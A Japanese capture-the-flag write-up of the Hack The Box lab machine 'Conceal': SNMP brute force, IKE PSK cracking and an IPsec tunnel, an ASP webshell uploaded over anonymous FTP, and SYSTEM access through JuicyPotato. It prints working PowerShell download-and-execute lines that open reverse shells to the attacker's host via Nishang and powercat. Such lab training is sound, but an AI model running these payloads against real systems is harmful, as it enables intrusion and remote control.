Hack The Box 攻略してみた(Conceal)Writeup

グラビアアイドル

Hack The Box 攻略してみた(Conceal)Writeup

nmap

TCP
nmap -sCTV -p- --stats-every 5s --min-rate 300 -oN nmap-tcp.log 10.10.10.116
Nmap scan report for 10.10.10.116
Host is up (0.29s latency).
All 65535 scanned ports on 10.10.10.116 are in ignored states.
Not shown: 65535 filtered tcp ports (no-response)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Dec 11 15:35:26 2023 -- 1 IP address (1 host up) scanned in 445.25 seconds

UDP
nmap -sU -p- --stats-every 5s --min-rate 300 10.10.10.116 > nmap-udp.log 10.10.10.116
Nmap scan report for 10.10.10.116
Host is up (0.29s latency).
Not shown: 65533 open|filtered udp ports (no-response)
PORT    STATE SERVICE
161/udp open  snmp
500/udp open  isakmp

# Nmap done at Mon Dec 11 15:41:40 2023 -- 1 IP address (1 host up) scanned in 354.67 seconds

snmp community name brute force

sudo nmap -Pn -sU --script snmp-brute 10.10.10.116 --min-rate 300 --script-args snmp-brute.communitiesdb=snmp-default.txt
Starting Nmap 7.94SVN ( https://nmap.org ) at 2023-12-16 17:00 JST
Nmap scan report for 10.10.10.116
Host is up (0.27s latency).
Not shown: 998 open|filtered udp ports (no-response)
PORT    STATE SERVICE
161/udp open  snmp
| snmp-brute: 
|_  public - Valid credentials
500/udp open  isakmp

Nmap done: 1 IP address (1 host up) scanned in 20.84 seconds

※snmp-default.txtはhttps://github.com/SECFORCE/sparta/blob/master/wordlists/snmp-default.txtからダウンロードした

snmpwalk

snmpwalk -c public -v1 10.10.10.116                     
iso.3.6.1.2.1.1.1.0 = STRING: "Hardware: AMD64 Family 23 Model 49 Stepping 0 AT/AT COMPATIBLE - Software: Windows Version 6.3 (Build 15063 Multiprocessor Free)"
iso.3.6.1.2.1.1.2.0 = OID: iso.3.6.1.4.1.311.1.1.3.1.1
iso.3.6.1.2.1.1.3.0 = Timeticks: (4917278) 13:39:32.78
iso.3.6.1.2.1.1.4.0 = STRING: "IKE VPN password PSK - 9C8B1A372B1878851BE2C097031B6E43"
iso.3.6.1.2.1.1.5.0 = STRING: "Conceal"
iso.3.6.1.2.1.1.6.0 = ""
iso.3.6.1.2.1.1.7.0 = INTEGER: 76
iso.3.6.1.2.1.2.1.0 = INTEGER: 15
iso.3.6.1.2.1.2.2.1.1.1 = INTEGER: 1
iso.3.6.1.2.1.2.2.1.1.2 = INTEGER: 2
iso.3.6.1.2.1.2.2.1.1.3 = INTEGER: 3
iso.3.6.1.2.1.2.2.1.1.4 = INTEGER: 4
(後略)

hash crack

ike-scan

ike-scan -M 10.10.10.116        
Starting ike-scan 1.9.5 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)
10.10.10.116	Main Mode Handshake returned
	HDR=(CKY-R=2eaf4593e68ea822)
	SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration(4)=0x00007080)
	VID=1e2b516905991c7d7c96fcbfb587e46100000009 (Windows-8)
	VID=4a131c81070358455c5728f20e95452f (RFC 3947 NAT-T)
	VID=90cb80913ebb696e086381b5ec427b1f (draft-ietf-ipsec-nat-t-ike-02\n)
	VID=4048b7d56ebce88525e7de7f00d6c2d3 (IKE Fragmentation)
	VID=fb1de3cdf341b7ea16b7e5be0855f120 (MS-Negotiation Discovery Capable)
	VID=e3a5966a76379fe707228231e5ce8652 (IKE CGA version 1)

Ending ike-scan 1.9.5: 1 hosts scanned in 0.369 seconds (2.71 hosts/sec).  1 returned handshake; 0 returned notify

ipsec.confとipsec.secretsファイルの編集

sudo nano /etc/ipec.conf
# ipsec.conf - strongSwan IPsec configuration file

# basic configuration

config setup

conn %default
       inactivity=1h
       keyexchange=ikev1
       ike=3des-sha1-modp1024
       esp=3des-sha1
       authby=secret

conn conceal
       left=10.10.14.26
       leftprotoport=tcp
       right=10.10.10.116
       rightprotoport=tcp
       rightsubnet=10.10.10.116[tcp/%any]
       type=transport
       auto=add
※それぞれの値はike-scanで得られた情報を参照する
sudo cat /etc/ipsec.secrets 
# This file holds shared secrets or RSA private keys for authentication.

# RSA private key for this host, authenticating it to any other host
# which knows the public part.

10.10.10.116  %any : PSK "Dudecake1!"
※PSKの値はcrackstationで判明した値を参照する

ipsec start

sudo ipsec start                
[sudo] kali のパスワード:
Starting strongSwan 5.9.12 IPsec [starter]...

ipsec up

sudo ipsec up conceal
generating QUICK_MODE request 3024468123 [ HASH SA No ID ID ]
sending packet: from 10.10.14.26[500] to 10.10.10.116[500] (220 bytes)
received packet: from 10.10.10.116[500] to 10.10.14.26[500] (188 bytes)
parsed QUICK_MODE response 3024468123 [ HASH SA No ID ID ]
selected proposal: ESP:3DES_CBC/HMAC_SHA1_96/NO_EXT_SEQ
detected rekeying of CHILD_SA conceal{1}
CHILD_SA conceal{2} established with SPIs c628a505_i b76a7e0e_o and TS 10.10.14.26/32[tcp] === 10.10.10.116/32[tcp]
connection 'conceal' established successfully

nmap

nmap -sCV -p- --stats-every 5s --min-rate 300 10.10.10.116
Nmap scan report for 10.10.10.116
Host is up (0.29s latency).
Not shown: 65523 closed tcp ports (conn-refused)
PORT      STATE SERVICE       VERSION
21/tcp    open  ftp           Microsoft ftpd
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst: 
|_  SYST: Windows_NT
80/tcp    open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds?
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
49670/tcp open  msrpc         Microsoft Windows RPC
(後略)

http

gobuster

gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.116/ -t 100
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.116/
[+] Method:                  GET
[+] Threads:                 100
[+] Wordlist:                /usr/share/dirb/wordlists/big.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/upload               (Status: 301) [Size: 150] [--> http://10.10.10.116/upload/]

===============================================================
Finished
===============================================================

http://10.10.10.116/upload/

ftp anonymous

ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||52079|)
125 Data connection already open; Transfer starting.
226 Transfer complete.
ftp> 

ftp file upload

cat test.txt 
upload OK!!

ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> put test.txt 
local: test.txt remote: test.txt
229 Entering Extended Passive Mode (|||52115|)
125 Data connection already open; Transfer starting.
100% |**************************************|    13      158.69 KiB/s    --:-- ETA
226 Transfer complete.
13 bytes sent in 00:00 (0.03 KiB/s)
http://10.10.10.116/upload/
http://10.10.10.116/upload/test.txt

webshell upload

ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> put webshell.asp 
local: webshell.asp remote: webshell.asp
229 Entering Extended Passive Mode (|||52240|)
125 Data connection already open; Transfer starting.
100% |**************************************|  1412       19.23 MiB/s    --:-- ETA
226 Transfer complete.
※webshell.aspはhttps://github.com/tennc/webshell/blob/master/asp/webshell.aspからダウンロードする
http://10.10.10.116/upload/webshell.asp

reverse shell

powershell invoke-expression (New-Object Net.WebClient).DownloadString(‘http://10.10.14.26:8888/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.26 -Port 4444
※このコマンドをwebshell.aspの入力フォームで送信する
※Invoke-PowerShellTcp.ps1はhttps://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1からダウンロードする

python3のhttpサーバで待ち受け

python3 -m http.server 8888
10.10.10.116 - - [17/Dec/2023 02:20:14] "GET /Invoke-PowerShellTcp.ps1 HTTP/1.1" 200 -

ncで待ち受け

nc -lnvp 4444
listening on [any] 4444 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.10.116] 52870
Windows PowerShell running as user CONCEAL$ on CONCEAL
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\SysWOW64\inetsrv>whoami
conceal\destitute

pfoof.txt

PS C:\Users\Destitute\Desktop> cat proof.txt
b1d83f0d1b2b2a99a93dbee0fcbfc8b6

privilege escalation

prigilege check

PS C:\> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeShutdownPrivilege           Shut down the system                      Disabled
SeAuditPrivilege              Generate security audits                  Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled
SeTimeZonePrivilege           Change the time zone                      Disabled
PS C:\> 

JuicyPotato.exe及び.batファイルをupload

cat test.bat                                    
powershell -c "IEX(New-Object System.Net.WebClient).DownloadString('http://10.10.14.26:8888/powercat.ps1');powercat -c 10.10.14.26 -p 5555 -e cmd"
※powercat.ps1はhttps://github.com/besimorhino/powercat/blob/master/powercat.ps1でダウンロードする

ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> binary
200 Type set to I.
ftp> put test.bat 
local: test.bat remote: test.bat
229 Entering Extended Passive Mode (|||53549|)
125 Data connection already open; Transfer starting.
100% |**************************************|   147        1.86 MiB/s    00:00 ETA
226 Transfer complete.
147 bytes sent in 00:00 (0.34 KiB/s)
※アップロードの際はbinaryモードで実行する(改行コードなどがOS別で変換されることがあるため)

ftp 10.10.10.116
Connected to 10.10.10.116.
220 Microsoft FTP Service
Name (10.10.10.116:kali): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> binary
200 Type set to I.
ftp> put JuicyPotato.exe 
local: JuicyPotato.exe remote: JuicyPotato.exe
229 Entering Extended Passive Mode (|||53529|)
125 Data connection already open; Transfer starting.
100% |**************************************|   339 KiB   48.61 KiB/s    00:00 ETA
226 Transfer complete.
347648 bytes sent in 00:07 (46.18 KiB/s)
※アップロードの際はbinaryモードで実行する(改行コードなどがOS別で変換されることがあるため)

JuicyPotato実行

PS C:\inetpub\wwwroot> PS C:\inetpub\wwwroot> ./JuicyPotato.exe -l 443 -p test.bat -t * -c '{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4}'
Testing {F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4} 443
......
[+] authresult 0
{F7FD3FD6-9994-452D-8DA7-9A8FD87AEEF4};NT AUTHORITY\SYSTEM

[+] CreateProcessWithTokenW OK

python3のhttpサーバで待ち受け

python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
10.10.10.116 - - [17/Dec/2023 02:50:09] "GET /powercat.ps1 HTTP/1.1" 200 -

ncで待ち受け

nc -lnvp 5555                                                        
listening on [any] 5555 ...
connect to [10.10.14.26] from (UNKNOWN) [10.10.10.116] 53777
Microsoft Windows [Version 10.0.15063]
(c) 2017 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
nt authority\system

C:\Windows\system32>

proof.txtはいつもの場所です。

コメント